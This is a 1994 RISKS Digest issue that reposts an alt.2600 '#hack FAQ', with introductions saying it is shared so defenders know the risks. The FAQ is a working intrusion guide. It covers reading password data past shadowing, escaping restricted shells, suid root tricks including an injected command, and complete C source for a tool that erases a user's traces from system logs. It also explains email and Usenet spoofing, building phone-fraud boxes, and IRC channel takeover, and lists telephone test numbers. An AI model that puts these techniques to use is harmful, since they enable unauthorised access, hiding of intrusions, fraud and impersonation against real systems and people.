|
Subject: RISKS DIGEST 16.29x REPLY-TO: risks@csl.sri.com RISKS-LIST: RISKS-FORUM Digest Tuesday 26 July 1994 Volume 16 : Issue 29x FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator ***** See last item for information on RISKS (comp.risks) ***** Contents: Hacking FAQ (Will Spencer via Martin Minow) ---------------------------------------------------------------------- Date: Fri, 22 Jul 94 09:54:48 -0700 From: Martin Minow <minow@apple.com> Subject: Hacking FAQ I recently received a copy of a "Hacking FAQ" ("frequently asked questions") that contained a laundry list of ways to break into computer systems, gain superuser privileges on Unix, determine the phone number you're calling from, etc. etc. It was marked as having been posted to Usenet alt.2600, but I couldn't verify this independently. Since the "bad guys" know this already, I don't have any objections to it's being posted in Risks. In any case, those of us concerned with protecting ourselves *against* these break-ins ought to be aware of the Unix/network parts of the document. [Some headers have been removed to protect the privacy of the person who sent it to me.] Martin Minow minow@apple.com From: will@gnu.ai.mit.edu (Will Spencer) Newsgroups: alt.2600 Subject: #hack FAQ Beta .004 Date: 9 Jul 1994 05:49:45 GMT Organization: Free Software Foundation / Cambridge, MA USA Message-ID: <2vldppINNp64@life.ai.mit.edu> NNTP-Posting-Host: spiff.gnu.ai.mit.edu Editors Note: This is a the first public beta release. This version is being released to find out more of what people want in the #hack FAQ. Please send constructive feedback to will@gnu.ai.mit.edu. Flames to /dev/null. Many sections are missing or imcomplete. The #hack FAQ comes with no warranties, express or implied. ** BETA ** #Hack F.A.Q. by Voyager will@gnu.ai.mit.edu With special thanks to: A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow, Presence, Rogue Agent, sbin and TheSaint. Beta Revision .004 01. How do I access the password file under Unix? 02. How do I crack Unix passwords? 03. How do I access the password file under VMS? 04. How do I crack VMS passwords? 05. What is NIS/yp? 06. What is password shadowing? 07. How do I break out of a restricted shell? 08. How do I gain root from a suid script or program? 09. How do I erase my presence from the system logs? 10. How do I send fakemail? 11. How do I fake posts to UseNet? 12. What is a Red Box? 13. How do I build a Red Box? 14. Which payphones will a Red Box work on? 15. What is a Blue Box? 16. Do Blue Boxes still work? 17. What is a Black Box? 18. What do all the colored boxes do? 19. What are some ftp sites of interest to hackers? 20. What are some newsgroups of interest to hackers? 21. What are some telnet sites of interest to hackers? 22. What are some World wide Web (WWW) sites of interest to hackers? 23. What are some IRC channels of interest to hackers? 24. What are some BBS's of interest to hackers? 25. How do I hack ChanOp on IRC? 26. How do I modify the IRC client to hide my real username? 27. What is the ANAC number for my area? 28. What is a ringback number? 29. What is the ringback number for my area? 30. What is a loop? 31. What is a loop in my area? 32. What is a CNA number? 33. What is the telephone company CNA number for my area? 34. What does XXX stand for? 35. What is a trojan/worm/virus? 36. Where can I find more information? 01. How do I access the password file under Unix? In standard Unix the password file is /etc/passwd. On a Unix system with either NIS/yp or password shadowing, much of the password data may be elsewhere. 02. How do I crack Unix passwords? Contrary to popular belief, Unix passwords cannot be decrypted. Unix passwords are encrypted with a one way function. The login program encrypts the text you enter at the "password:" prompt and compares that encrypted string against the encrypted form of your password. Password cracking software uses wordlists. Each word in the wordlist is encrypted with each of the 2600 possible salt values and the results are compared to the encrypted form of the target password. The best cracking program for Unix passwords is currently Crack by Alec Muffett. For PC-DOS, the best package to use is currently CrackerJack. 03. How do I access the password file under VMS? Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However, unlike Unix, most users do not have access to read the password file. 04. How do I crack VMS passwords? Write a program that uses the SYS$GETUAF functions to compare the results of encrypted words against the encrypted data in SYSUAF.DAT. Two such programs are known to exist, CHECK_PASSWORD and GUESS_PASSWORD. 05. What is NIS/yp? NIS (Network Information System) in the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machies on a network to share configuration information, including password data. NIS is not designed to promote system security. If your system uses NIS you will have a very short /etc/passwd file with a line that looks like this: +::0:0::: To view the real password file use this command "cd/etc;ypcat passwd" 06. What is password shadowing? Password shadowing is a security system where the encrypted password field of /etc/password is replaced with a special token and the encrypted password is stored in a seperate file which is not readable by normal system users. To defeat password shadowing on many systems, write a program that uses successive calls to getpwent() to obtain the password file. Example: #include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 07. How do I break out of a restricted shell? On poorly implemented restricted shells you can break out of the restricted environment by running a program that features a shell function. A good example is vi. Run vi and use this command: :set shell=/bin/sh then shell using this command: :shell 08. How do I gain root from a suid script or program? 1. Change IFS. If the shell script calls any other programs using the system() function call, you may be able to fool it by changing IFS. IFS is the Internal Field Seperator that the shell uses to delimit arguments. If the program contains a line that looks like this: system("/bin/date") and you change IFS to '/' the shell will them interpret the proceeding line as: bin date Now, if you have a program of your own in the path called "bin" the suid program will run your program instead of /bin/date. To change IFS, use this command: set IFS '/' 2. link the script to -i Create a symbolic link named "-i" to the program. Running "-i" will cause the interpreter shell (/bin/sh) to start up in interactive mode. This only works on suid shell scripts. Example: % ln suid.sh -i % -i # 3. Exploit a race condition Replace a symbolic link to the program with another program while the kernel is loading /bin/sh. Example: nice -19 suidprog ; ln -s evilprog suidroot 4. Send bad input the the program. Invoke the name of the program and a seperate command on the same command line. Example: suidprog ; id 09. How do I erase my presence from the system logs? Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose. Example: #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } 10. How do I send fakemail? Telnet to port 25 of the machine you want the mail to appear to originate from. Enter your message as in this example: HELO bellcore.com MAIL FROM:Voyagor@bellcore.com RCPT TO:clinton@whitehouse.gov DATA Please discontinue your silly Clipper initiative. . QUIT On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not work. Test by sending yourself fakemail first. 11. How do I fake posts to UseNet? Use inews to post. Give inews the following lines: From: Newsgroups: Subject: Message-ID: Date: Organization: For a moderated newsgroup, inews will also require this line: Approved: Then add your post and terminate with <Control-D>. Example: From: Dale Drew Newsgroups: alt.2600 Subject: Please forgive me Message-ID: <d_drew.123@tymnet.com> Date: Fri, 13 Jun 1994 12:15:03 Organization: Tymnet Insecurity Please forgive me for being such a worthless puke all of these years. Sincerely, Bartman ^D 12. What is a Red Box? When a coin is inserted into a payphone, the phone emits a set of tones. A red box is a device that simulates those tones, with the purpose of fooling the payphone into believing you have inserted an actual coin. 13. How do I build a Red Box? Red boxes are commonly manufactured from modified Radio Shack tone dialers, Hallmark greeting cards, or made from scratch from readily available electronic components. To make a Red Box from a radio shack tone dialer, open the dialer and replace the crystal (the largest shiny metal component) with a crystal close to 6.5Mhz. The most popular choice is the 6.5536Mhz crystal. When you are finished, program the P1 button with five *'s. That will simulate a quarter tone. Note that the tone dialer you start with must have programmable buttons. 14. Which payphones will a Red Box work on? Red Boxes will work on TelCo owned payphones, but not on COCOT's (Customer Owned Coin Operated Telephones). 15. What is a Blue Box? Blue boxes use a 2600hz tone to convince telephone switches that use in-band signalling that the caller is actually a telephone operator. The caller may then access special switch functions, with the usual purpose of making free long distance phone calls, using the Multi-Frequency tones provided by the Blue Box. 16. Do Blue Boxes still work? Blue Boxes still work in areas using in-band signalling. Modern phone signalling switches using ESS (Electronic Signalling Systems) use out-of-band-signalling. Nothing you send over the voice portion of bandwidth can control the switch. 17. What is a Black Box? A Black Box is a 10k ohm resistor placed across your phone line to cause the phone company equipment to be unable to detect that you have answered your telephone. People who call you will then not be billed for the telephone call. 18. What do all the colored boxes do? Acrylic Steal Three-Way-Calling, Call Waiting and programmable Call Forwarding on old 4-wire phone systems Aqua Drain the voltage of the FBI lock-in-trace/trap-trace Beige Lineman's hand set Black Allows the calling party to not be billed for the call placed Blast Phone microphone amplifier Blotto Supposedly shorts every fone out in the immediate area Blue Emulate a true operator by siezing a trunk with a 2600hz tone Brown Create a party line from 2 phone lines Bud Tap into your neighbors phone line Chartreuse Use the electricity from your phone line Cheese Connect two phones to create a divertor Chrome Manipulate Traffic Signals by Remote Control Clear A telephone pickup coil and a small amp use to make free calls on Fortress Phones Color Line activated telephone recorder Copper Cause crosstalk interference on an extender Crimson Hold button Dark Re-route outgoing or incoming calls to another phone Dayglo Connect to your neighbors phone line Divertor Re-route outgoing or incoming calls to another phone DLOC Create a party line from 2 phone lines Gold Trace calls, tell if the call is being traced, and can change a trace Green Emulate the Coin Collect, Coin Return, and Ringback tones Infinity Remotely activated phone tap Jack Touch-Tone key pad Light In-use light Lunch AM transmitter Magenta Connect a remote phone line to another remote phone line Mauve Phone tap without cutting into a line Neon External microphone Noise Create line noise Olive External ringer Party Create a party line from 2 phone lines Pearl Tone generator Pink Create a party line from 2 phone lines Purple Telephone hold button Rainbow Kill a trace by putting 120v into the phone line (uh huh..) Razz Tap into your neighbors phone Red Make free phone calls from pay phones by generating quarter tones Rock Add music to your phone line Scarlet Cause a neighbors phone line to have poor reception Silver Create the DTMF tones for A, B, C and D Static Keep the voltage on a phone line high Switch Add hold, indicator lights, conferencing, etc.. Tan Line activated telephone recorder Tron Reverse the phase of power to your house, causing your electric meter to run slower TV Cable "See" sound waves on your TV Urine Create a capacitative disturbance between the ring and tip wires in another's telephone headset Violet Keep a payphone from hanging up White Portable DTMF keypad Yellow Add an extension phone 19. What are some ftp sites of interest to hackers? aql.gatech.edu bellcore.com cert.org cipher.com deimos.cs.uah.edu ftp.csua.berkeley.edu /pub/cypherpunks ftp.eff.org /pub/cud ftp.etext.org ftp.netcom.com /pub/bradleym ftp.netsys.com ftp.win.tue.nl garbo.uwasa.fi:pc/crypt ghost.dsi.unimi.it:/pub/crypt hack-this.pc.cc.cmu.edu halcyon.com info.cert.org ripem.msu.edu:pub/crypt rtfm.mit.edu spy.org theta.iis.u-tokyo.ac.jp /pub1/security vincent2.iastate.edu login: anonymous.mabell /* Closed for the Summer */ wimsey.bc.ca /pub/crypto 20. What are some newsgroups of interest to hackers? alt.2600 alt.dcom.telecom alt.hackers alt.security.index alt.security.keydist alt.security.pgp alt.security.ripem alt.security comp.dcom.telecom Telecommunications digest. (Moderated) comp.dcom.telecom.tech comp.org.cpsr.announce comp.org.cpsr.talk comp.org.eff comp.org.eff comp.security.announce comp.security.misc Security issues of computers and networks. comp.security.unix comp.virus Computer viruses & security. (Moderated) misc.security Security in general, not just computers. (Moderated) sci.crypt Different methods of data en/decryption. 21. What are some telnet sites of interest to hackers? 22. What are some World wide Web (WWW) sites of interest to hackers? http://crimelab.com//bugtraq/bugtraq/html http://cs.purdue.edu/homes/spaf/coast.html http://cs.purdue.edu/homes/spaf/pcert.html http://first.org http://l0pht.com http://tamsun.tamu.edu/~clm3840/hacking.html/ http://www.net23.com http://www.tnt.uni-hannover.de/stud/hamid.html http://www.spy.org /Security/Local/News http://www.phantom.com/~king 23. What are some IRC channels of interest to hackers? #hack #phreak #linux #unix #warez 24. What are some BBS's of interest to hackers? Home BBS (303)343-4053 25. How do I hack ChanOp on IRC? Find a server that is split from the rest of IRC and create your own channel there using the name of the channel you want ChanOp on. When that server reconnects to the net, you will have ChanOp on the real channel. If you have ServerOp on a server, you can cause it to split on purpose. 26. How do I modify the IRC client to hide my real username? Get the IRC client from cs.bu.edu /irc/clients. Look at the source code files irc.c and ctcp.c. The code you are looking for is fairly easy to spot. Change it. Change the username code in irc.c and the ctcp information code in ctcp.c. Compile and run your client. 27. What is the ANAC number for my area? How to find your ANAC number: Look up your NPA (Area Code) and try the number listed for it. If that fails, try 1 plus the number listed for it. If that fails, try the common numbers like 311, 958 and 200-222-2222. If that fails, try the nationwide ANAC number 404-988-9664. If you find the ANAC number for your area, please let us know. Note that many times the ANAC number will vary for different switches in the same city. A trick to getting the number of the phone line you are calling from is to call (800)571-8859. It is an 800 phone sex line. The system will give you an account number. The first 10 digits of the account number will be the telephone number from which you are calling. NPA ANAC number Comments --- --------------- --------------------------------------------- 201 958 Hackensack/Jersey City/Newark/Paterson, NJ 203 960 CT (All) 203 970 CT (All) 204 644-xxxx Manitoba 205 908-222-2222 Birmingham, AL 206 411 WA /* Not US West */ 207 958 ME (All) 209 830 Stockton, CA 212 958 Manhattan, NY 213 114 Los Angeles, CA 213 1223 Los Angeles, CA /* some 1AESS switches */ 213 211-2345 Los Angeles, CA /* English response */ 213 211-2346 Los Angeles, CA /* DTMF response */ 213 61056 Los Angeles, CA 214 790 Dallas, TX /* GTE */ 214 970-222-2222 Dallas, TX 214 970-611-1111 Dallas, TX /* Southwestern Bell */ 215 410-xxxx Philadelphia, PA 217 200-xxx-xxxx Champaign-Urbana/Springfield, IL 301 958-9968 Hagerstown/Rockville, MD 305 200-222-2222 Ft. Lauderdale/Key West/Miami, FL 309 200-xxx-xxxx Peoria/Rock Island, IL 310 114 Long Beach, CA /* on many GTE switches */ 310 1223 Long Beach, CA /* some 1AESS switches */ 310 211-2345 Long Beach, CA /* English response */ 310 211-2346 Long Beach, CA /* DTMF response */ 312 1-200-5863 Chicago, IL 312 200-xxx-xxxx Chicago, IL 312 290 Chicago, IL 313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI 313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI 313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI 313 200200200200200 Ann Arbor/Dearborn/Detroit, MI 314 511 Columbia/Jefferson City, MO 317 310-222-2222 Indianapolis/Kokomo, IN 317 743-1218 Indianapolis/Kokomo, IN 401 222-2222 RI (All) 402 311 Lincoln, NE 403 311 Alberta, Yukon and N.W. Territory 403 908-222-2222 Alberta, Yukon and N.W. Territory 403 999 Alberta, Yukon and N.W. Territory 404 311 Atlanta, GA 404 940-xxx-xxxx Atlanta, GA 405 897 Enid/Oklahoma City, OK 407 200-222-2222 Orlando/West Palm Beach, FL 408 300-xxx-xxxx San Jose, CA 408 760 San Jose, CA 408 940 San Jose, CA 409 951 Beaumont/Galveston, TX 409 970-xxxx Beaumont/Galveston, TX 410 200-555-1212 Annapolis/Baltimore, MD 410 811 Annapolis/Baltimore, MD 412 711-6633 Pittsburgh, PA 412 711-4411 Pittsburgh, PA 412 999-xxxx Pittsburgh, PA 413 958 Pittsfield/Springfield, MA 413 200-555-5555 Pittsfield/Springfield, MA 414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI 415 200-555-1212 San Francisco, CA 415 211-2111 San Francisco, CA 415 2222 San Francisco, CA 415 640 San Francisco, CA 415 760-2878 San Francisco, CA 415 7600-2222 San Francisco, CA 419 311 Toledo, OH 502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville, KY 503 611 Portland, OR /* not all parts of town */ 508 958 Fall River/New Bedford/Worchester, MA 508 200-222-1234 Fall River/New Bedford/Worchester, MA 508 200-222-2222 Fall River/New Bedford/Worchester, MA 509 560 Spokane/Walla Walla/Yakima, WA 512 200-222-2222 Austin/Corpus Christi, TX 512 830 Austin/Corpus Christi, TX 512 970-xxxx Austin/Corpus Christi, TX 514 320-xxxx Montreal, Quebec 515 5463 Des Moines, IA 516 958 Hempstead/Long Island, NY 516 968 Hempstead/Long Island, NY 517 200-222-2222 Bay City/Jackson/Lansing, MI 517 200200200200200 Bay City/Jackson/Lansing, MI 518 997 Albany/Schenectady/Troy, NY 518 998 Albany/Schenectady/Troy, NY 602 593-0809 Phoenix, AZ 602 593-6017 Phoenix, AZ 602 593-7451 Phoenix, AZ 603 200-222-2222 NH (All) 606 997-555-1212 Ashland/Winchester, KY 607 993 Binghamton/Elmira, NY 609 958 Atlantic City/Camden/Trenton/Vineland, NJ 612 511 Minneapolis/St.Paul, MN 615 200200200200200 Nashville, TN 615 830 Nashville, TN 616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, MI 617 200-222-1234 Boston, MA 617 200-222-2222 Boston, MA 617 200-444-4444 Boston, MA /* Woburn, MA */ 617 220-2622 Boston, MA 617 958 Boston, MA 618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL 708 1-200-xxxx Chicago/Elgin, IL 713 970-xxxx Houston, TX 714 211-2121 Anaheim, CA /* GTE */ 716 511 Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */ 717 958 Harrisburg/Scranton/Wilkes-Barre, PA 718 958 Bronx/Brooklyn/Queens/Staten Island, NY 802 2-222-222-2222 Vermont (All) 802 200-222-2222 Vermont (All) 805 830 San Luis Obispo, CA 806 970-xxxx Amarillo/Lubbock, TX 810 200200200200200 Michigan 812 410-555-1212 Evansville, IN 815 200-xxx-xxxx La Salle/Rockford, IL 815 290 La Salle/Rockford, IL 817 211 Ft. Worth/Waco, TX 817 970-611-1111 Ft. Worth/Waco, TX /* Southwestern Bell */ 818 1223 Pasadena, CA /* some 1AESS switches */ 818 211-2345 Pasadena, CA /* English response */ 818 211-2346 Pasadena, CA /* DTMF response */ 906 200-222-2222 Marquette/Sault Ste. Marie, MI 908 958 New Brunswick, NJ 910 311 Fayetteville/Greensboro/Raliegh/Winston-Salem, NC 914 990-1111 Peekskill/Poughkeepsie/White Plains/Yonkers, NY 915 970-xxxx Abilene/El Paso, TX 919 711 Durham, NC Canada: 306 115 Saskatchewan, Canada 416 410-xxxx Toronto, Ontario 416 997-xxxx Toronto, Ontario 519 320-xxxx London, Ontario 604 1116 British Columbia, Canada 604 1211 British Columbia, Canada 604 211 British Columbia, Canada 613 320-2232 Ottawa, Ontario 705 320-xxxx Saulte Ste. Marie, Ontario Australia: +61 03-552-4111 Victoria 03 area +61 19123 All major capital cities 28. What is a ringback number? A ringback number is a number that you call that will immediately ring the telephone from which it was called. 29. What is the ringback number for my area? 203 991-xxxx CT (All) 209 890-xxxx Stockton, CA 303 99X-xxxx Grand Junction, CO 312 200-xxxx Chicago, IL 502 988 Lexington, KY 512 95X-xxxx Austin, TX 601 777-xxxx MS (All) 619 331-xxxx San Diego, CA 619 332-xxxx San Diego, CA 716 981-xxxx Rochester, NY /* Rochester Tel */ 30. What is a loop? A loop is two phone numbers connected together by the phone company for testing purposes. A loop has a high end and a low end. If you dial the high end, you will hear nothing. Not even a ring. If you dial the low end, you will hear an annoying 1,000hz tone for several seconds. If you connect to the high end and someone dials the low end, you can speak to each other. 31. What is a loop in my area? NPA High Low --- -------- -------- 201 228-9929 228-9930 201 238-9929 238-9930 201 251-9929 251-9930 201 254-9929 254-9930 201 272-9929 272-9930 201 330-9929 330-9930 201 333-9929 333-9930 201 339-9929 339-9930 201 347-9929 347-9930 201 376-9929 376-9930 201 398-9929 398-9930 201 467-9929 467-9930 201 528-9929 528-9930 201 558-9929 558-9930 201 559-9929 559-9930 201 560-9929 560-9930 201 592-9929 592-9930 201 625-9929 625-9930 201 631-9929 631-9930 201 637-9929 637-9930 201 655-9929 655-9930 201 666-9929 666-9930 201 690-9929 690-9930 201 761-9929 761-9930 201 762-9929 762-9929 201 762-9929 762-9930 201 762-9929 762-9929 201 763-9929 763-9930 201 764-9929 764-9930 201 767-9929 767-9930 201 768-9929 768-9930 201 773-9929 773-9930 201 879-9929 879-9930 201 946-9929 946-9930 201 992-9929 992-9930 201 993-9929 993-9930 201 994-9929 994-9930 201 994-9930 212 352-9900 352-9906 213 360-1118 360-1119 213 365-1118 365-1119 213 455-0002 455-xxxx 213 455-0002 455-XXXX 213 546-0002 546-XXXX 213 546-0002 546-xxxx 305 778-9952 778-9951 305 964-9951 964-9952 312 222-9973 222-9974 312 234-9973 234-9974 313 224-9996 224-9997 313 225-9996 225-9997 313 234-9996 234-9997 313 237-9996 237-9997 313 256-9996 256-9997 313 272-9996 272-9997 313 273-9996 273-9997 313 277-9996 277-9997 313 281-9996 281-9997 313 292-9996 292-9997 313 299-9996 299-9997 313 321-9996 321-9997 313 326-9996 326-9997 313 356-9996 356-9997 313 362-9996 362-9997 313 369-9996 369-9997 313 388-9996 388-9997 313 397-9996 397-9997 313 399-9996 399-9997 313 445-9996 445-9997 313 465-9996 465-9997 313 471-9996 471-9997 313 474-9996 474-9997 313 477-9996 477-9997 313 478-9996 478-9997 313 483-9996 483-9997 313 497-9996 497-9997 313 526-9996 526-9997 313 552-9996 552-9997 313 556-9996 556-9997 313 561-9996 561-9997 313 569-9996 569-9996 313 575-9996 575-9997 313 577-9996 577-9997 313 585-9996 585-9997 313 591-9996 591-9997 313 621-9996 621-9997 313 626-9996 626-9997 313 644-9996 644-9997 313 646-9996 646-9997 313 647-9996 647-9997 313 649-9996 649-9997 313 663-9996 663-9997 313 665-9996 665-9997 313 683-9996 683-9997 313 721-9996 721-9997 313 722-9996 722-9997 313 728-9996 728-9997 313 731-9996 731-9997 313 751-9996 751-9997 313 776-9996 776-9997 313 781-9996 781-9997 313 787-9996 787-9997 313 822-9996 822-9997 313 833-9996 833-9997 313 851-9996 851-9997 313 871-9996 871-9997 313 875-9996 875-9997 313 886-9996 886-9997 313 888-9996 888-9997 313 898-9996 898-9997 313 934-9996 934-9997 313 942-9996 942-9997 313 963-9996 963-9997 313 977-9996 977-9997 313 995-9996 995-9997 402 422-0001 422-0002 402 422-0005 422-0006 402 422-0007 422-0008 402 422-0003 422-0004 402 422-0005 422-0006 402 422-0007 422-0008 402 422-0009 ALL-PREF 402 422-0003 422-0004 402 422-0009 ALL-PREF 402 422-0001 422-0002 402 572-0003 572-0004 517 422-9996 422-9997 517 423-9996 423-9997 517 455-9996 455-9997 517 563-9996 563-9997 517 663-9996 663-9997 517 851-9996 851-9997 609 921-9929 921-9930 609 994-9929 609 994-9929 994-9930 616 997-9996 997-9997 616 ALL-PREF ALL-PREF 713 224-1499 759-1799 713 324-1499 324-1799 713 339-1499 339-1799 713 342-1499 342-1799 713 351-1499 351-1799 713 354-1499 354-1799 713 356-1499 356-1799 713 442-1499 442-1799 713 447-1499 447-1799 713 455-1499 455-1799 713 458-1499 458-1799 713 462-1499 462-1799 713 466-1499 466-1799 713 468-1499 468-1799 713 469-1499 469-1799 713 471-1499 471-1799 713 481-1499 481-1799 713 482-1499 482-1799 713 484-1499 484-1799 713 487-1499 487-1799 713 489-1499 489-1799 713 492-1499 492-1799 713 493-1499 493-1799 713 524-1499 524-1799 713 526-1499 526-1799 713 555-1499 555-1799 713 661-1499 661-1799 713 664-1499 664-1799 713 665-1499 665-1799 713 666-1499 666-1799 713 667-1499 667-1799 713 682-1499 976-1799 713 771-1499 771-1799 713 780-1499 780-1799 713 781-1499 997-1799 713 960-1499 960-1799 713 977-1499 977-1799 713 988-1499 988-1799 714 535-1118 535-1119 714 538-1118 538-1119 714 858-1118 858-1119 714 879-1118 879-1119 805 528-0044 528-0045 805 544-0044 544-0045 805 773-0044 773-0045 813 385-9971 908 776-9930 776-9930 32. What is a CNA number? CNA stands for Customer Name and Address. The CNA number is a phone number for telephone company personnel to call and get the name and address for a phone number. If a telephone lineman finds a phone line he does not recognize, he can use the ANI number to find it's phone number and then call the CNA operator to see who owns it and where they live. Normal CNA numbers are available only to telephone company personnel. Private citizens may now legally get CNA information from private companies. Two such companies are: Unidirectory (900)933-3330 Telename (900)884-1212 Note that these are 900 numbers, and will cost you approximately one dollar per minute. 33. What is the telephone company CNA number for my area? 614 614-464-0123 34. What does XXX stand for? TLA Three Letter acronym ALRU-Automatic Line Record Update AN-Associated Number ARSB-Automated Repair Service Bureau ATH-Abbreviated Trouble History BOC-Bell Operating Company BOR-Basic Output Report CA-Cable COE-Central Office Equipment CMC-Construction Maintenance Center CRSAB-Centralized Repair Service Answering Bureau DDD-Direct Distance Dialing ECC-Enter Cable Change LMOS-Loop Maintenance Operations System MLT-Mechanized Loop Testing POTS-Plain Old Telephone Service RSB-Repair Service Bureau SS-Special Service TAS-Telephone Answering Service TH-Trouble History TREAT-Trouble Report Evaluation and Analysis Tool NTA: The Nocturnal Trading Alliance PE: Public Enemy TDT: The Dream Team THG: The Humble Guys THP: The Hill People 35. What is a trojan/worm/virus? Trojan: A program that when run by a user does an action that the users did not expect, or the program was not designed to do. Virus: A portion of code that attaches it self to other executable files in the attempt to replicate and spread itself. Worm: A stand alone program that acomplishes a task in the background by replicating and moving though a computer network. 36. Where can I find more information? -- \* Will Spencer : The advancement and diffusion of knowledge *\ \* Unix geek : is the only guardian of true liberty. *\ \* PC guru : -- James Madison *\ \* Revolutionary : 4th U.S. President *\ [This is archived here solely in the hopes that people will become aware of the risks. RISKS does not encourage illegal activities. PGN] ------------------------------ End of RISKS-FORUM Digest 16.29x ************************